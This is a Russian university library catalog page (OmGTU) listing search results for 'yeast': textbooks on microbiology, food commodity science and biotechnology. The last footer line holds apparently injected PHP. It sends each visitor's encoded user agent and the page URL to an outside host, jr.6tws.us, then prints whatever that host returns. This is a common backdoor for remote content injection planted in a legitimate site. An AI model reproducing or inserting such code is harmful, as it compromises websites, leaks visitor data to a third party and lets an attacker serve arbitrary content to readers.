Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

119 пользователей


Зарегистрированных: 1 

Зимакова Виолетта Вячеславовна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ДРОЖЖИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 55
1. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
2. 
Мармузова Л. В. Основы микробиологии, санитарии и гигиены в пищевой промышленности [Текст] : Учеб. / Л. В. Мармузова, 2000. - 132 с.
Держатели документа (Информация об экземплярах) 
3. 
Матюхина З. П. Товароведение пищевых продуктов [Текст] : Учеб. пособие для учрежд. нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 2000. - 271 с.
Держатели документа (Информация об экземплярах) 
4. 
Товароведение и организация торговли продовольственными товарами [Текст] : Учеб. для учреждений нач. проф. образования / А. М. Новикова, Т. С. Голубкина, Н. С. Никифорова, С. А. Прокофьева, 2001. - 472 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ зерномучных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ плодоовощных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ вкусовых товаров -- ТОВАРОВЕДЕНИЕ кондитерских товаров -- ТОВАРОВЕДЕНИЕ молочных товаров -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ мясных продуктов -- ТОВАРОВЕДЕНИЕ рыбных продуктов -- ТОРГОВЛЯ РОЗНИЧНАЯ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- МАГАЗИН -- ПРИЕМКА ТОВАРОВ -- ХРАНЕНИЕ ТОВАРА -- Выкладка товара -- ПРОДАЖА ТОВАРА -- УПАКОВКА товара -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА -- КРУПА -- МУКА -- ХЛЕБ -- ДРОЖЖИ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ОВОЩИ -- Плоды -- Грибы -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- Напиток слабоалкогольный -- КРАХМАЛ -- Сахар -- Мед -- Молоко -- Мороженое -- Сыр -- МЯСО -- Рыба
Держатели документа (Информация об экземплярах) 
5. 
Микробиология, гигиена и санитария в торговле [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования и уч-ся учеб. заведений нач. проф. образования / Автор-сост. Т. П. Трушина, 2000. - 315,[1] с.
6. 
Дубцов Г. Г. Товароведение пищевых продуктов [Текст] : учеб. для студ. образоват. учрежд. сред. проф. образования / Г. Г. Дубцов, 2002. - 264 с.
Держатели документа (Информация об экземплярах) 
7. 
Мудрецова-Висс К. А. Микробиология, санитария и гигиена [Текст] : учеб. для студ. вузов / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2009. - 399 с.
Держатели документа (Информация об экземплярах) 
8. 
Мармузова Л. В. Основы микробиологии, санитарии и гигиены в пищевой промышленности [Текст] : учеб. для учреждений нач. проф. образования / Л. В. Мармузова, 2004. - 132 с.
9. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
10. 
Дубцов Г. Г. Товароведение пищевых продуктов [Текст] : Учеб. для студ. образоват. учрежд. сред. проф. образования / Г. Г. Дубцов, 2001. - 264 с.
Держатели документа (Информация об экземплярах) 
11. 
Мармузова Л. В. Основы микробиологии, санитарии и гигиены в пищевой промышленности [Текст] : Учеб. / Л. В. Мармузова, 2001. - 132 с.
Держатели документа (Информация об экземплярах) 
12. 
Егорова, Татьяна Алексеевна. Основы биотехнологии [Текст] : учеб. пособие для вузов по специальности "Биология" / Т. А. Егорова, С. М. Клунова, Е. А. Живухина, 2006. - 207, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- КОРМОВОЙ -- БЕЛОК -- ДРОЖЖИ -- БАКТЕРИЯ -- ПИЩЕВАЯ -- ПРОМЫШЛЕННОСТЬ -- ВОДОРОСЛЬ -- ГРИБ -- БИОГАЗ -- КСЕНОБИОТИК -- ЗАГРЯЗНЯЮЩЕЕ -- ВЕЩЕСТВО -- ОКРУЖАЮЩАЯ -- СРЕДА -- ЭТАНОЛ -- ОЧИСТКА -- СТОЧНАЯ -- ВОДА -- МЕТАБОЛИТ -- АМИНОКИСЛОТА -- ВИТАМИН -- ОРГАНИЧЕСКАЯ -- КИСЛОТА -- АНТИБИОТИК -- СТЕРОИД -- ФЕРМЕНТ -- ЭНЗИМОЛОГИЯ -- ИММОБИЛИЗАЦИЯ -- КЛЕТКА -- ЦЕЛЛЮЛОЗА -- ГЛЮКОЗА -- ДНК -- КЛОНИРОВАНИЕ -- ИНСУЛИН -- СОМАТОТРОПИН -- ИНТЕРФЕРОН -- ТРАНСГЕННАЯ -- ФОТОСИНТЕЗ -- РАСТЕНИЕ -- УСТОЙЧИВОСТЬ -- ФИТОПАТОГЕН -- ГЕРБИЦИД -- НАСЕКОМЫЕ -- АБИОТИЧЕСКИЙ -- СТРЕСС -- ТКАНЬ -- КЛЕТКА -- КУЛЬТИВИРОВАНИЕ -- КАЛЛУСОГЕНЕЗ -- МОРФОГЕНЕЗ -- ТОТИПОТЕНТНОСТЬ -- ПРОТОПЛАСТ -- МИКРОРАЗМНОЖЕНИЕ -- КРИОСОХРАНЕНИЕ

В книге изложены и обобщены традиционные и новейшие технологии, основанные на достижениях <биохимии>, <молекулярной> и <клеточной> <биологии>, рассмотрены социально-экономические проблемы и перспективы развития биотехнологии в третьем тысячелетии.

13. 
Основы микробиологии и биотехнологии [Текст] : Метод. указания к лаб. работам по специальности 320700 "Охрана окружаюшей среды и рациональное использование природных ресурсов" / ОмГТУ, 2003. - 39 с.
Держатели документа (Информация об экземплярах) 
Полный текст
14. 
Мудрецова-Висс, Клавдия Алексеевна. Микробиология, санитария и гигиена [Текст] : Учеб. для вузов по специальностям: "Товароведение и экспертиза товаров", "Технология продуктов общественного питания", "Стандартизация и сертификация" / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2001. - 378 с.
15. 
Территориальные единичные расценки на монтаж оборудования. Омская область [Текст]. Ч. 28 : Оборудование предприятий пищевой промышленности, 2010. - 56 с.
Ключевые слова 
ТЕРм 81-03-28-2001 -- СМЕТНЫЙ -- НОРМАТИВ -- ДОЗИРОВАНИЕ -- МУКА -- СМЕШИВАНИЕ -- ПРИГОТОВЛЕНИЕ -- ДРОЖЖИ -- ДЕЖИ -- ТЕСТО -- СУШИЛКА -- СУХАРЬ -- РАСФАСОВКА -- САХАР -- МОЙКА -- МЕШАЛКА -- ЛОВУШКА -- ФИЛЬТРАЦИОННОЕ -- ВОДООТДЕЛИТЕЛЬ -- ВОДООТВОДЧИК -- ПРЕСС -- ДИФФУЗИОННОЕ -- ПЕЧЬ -- РАЗДЕЛКА -- ТУША -- ЛЬДОГЕНЕРАТОР -- ПОСОЛЬНОЕ -- РЕЗЕРВУАР -- МОЛОКО -- ТЕРМООБРАБОТКА -- СЛИВКИ -- МАСЛО -- СЫР -- МОРОЖЕНОЕ -- КАЗЕИН -- ДРОБИЛКА -- УКУПОРКА -- МАКАРОНЫ -- КОНФЕТЫ -- ВИНОГРАД -- СПИРТ -- ПИВО -- ТАБАК -- ЧАЙ -- КАРТОНАЖНЫЕ -- ОБЩЕСТВЕННОЕ -- ПИТАНИЕ -- ЖЕСТЯНАЯ -- ТАРА -- СОЛОД -- СУСЛО
Держатели документа (Информация об экземплярах) 
16. 
Лысковцов, Иван Васильевич. Разделение жидкостей на центробежных аппаратах [Текст] / И. В. Лысковцов, 1968. - 143, [1] с.
Держатели документа (Информация об экземплярах) 
17. 
Матюхина З. П. Товароведение пищевых продуктов [Текст] : Учеб. пособие для учрежд. нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 2001. - 271 с.
Держатели документа (Информация об экземплярах) 
18. 
Римарева, Любовь Вячеславовна. Теоретические и практические основы биотехнологии дрожжей [Текст] : учеб. пособие для вузов по специальности 260204 "Технология бродильных производств и виноделие" направления подгот. дипломир. специалиста 260200 "Производство продуктов питания из растительного сырья" / Л. В. Римарева, 2010. - 251 с.
Держатели документа (Информация об экземплярах) 

В настоящее время открываются широкие перспективы эффективного использования дрожжевых культур в различных биотехнологических процессах при производстве спирта, пива, вина, кваса, хлеба, пищевого белка, биологически активных пищевых добавок. В учебнике представлены теоретические и практические основы биотехнологии спиртовых дрожжей, даются основные представления о современных методах получения активных рас дрожжей, обладающих новыми морфолого-физиологическими и культурными свойствами. В книге обобщены достижения современной науки в области биологии, ферментологии и микробиологии дрожжевой клетки. Подробно освещены все этапы промышленного производства и применения дрожжей в спиртовой отрасли, а также ферментных препаратов для биокатализа полимеров зернового сырья в процессе приготовления зернового сусла для генерации дрожжей и спиртового брожения. Особое внимание уделено вопросам совершенствования биотехнологических процессов спиртового производства, качеству зернового сырья и способам ферментативной обработки в зависимости от вида зерновой культуры.

19. 
Пехташева, Елена Леонидовна. Биоповреждения и защита непродовольственнах товаров [Текст] : Учебник гриф-УМО / Е. Л. Пехташева, 2002. - 224 с.
Держатели документа (Информация об экземплярах) 
20. 
Матюхина, Зинаида Петровна. Товароведение пищевых продуктов [Текст] : Учеб. для учеб. заведений нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 1999. - 272 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3026 - 22.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.85 с.12 запросов, 0.59c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;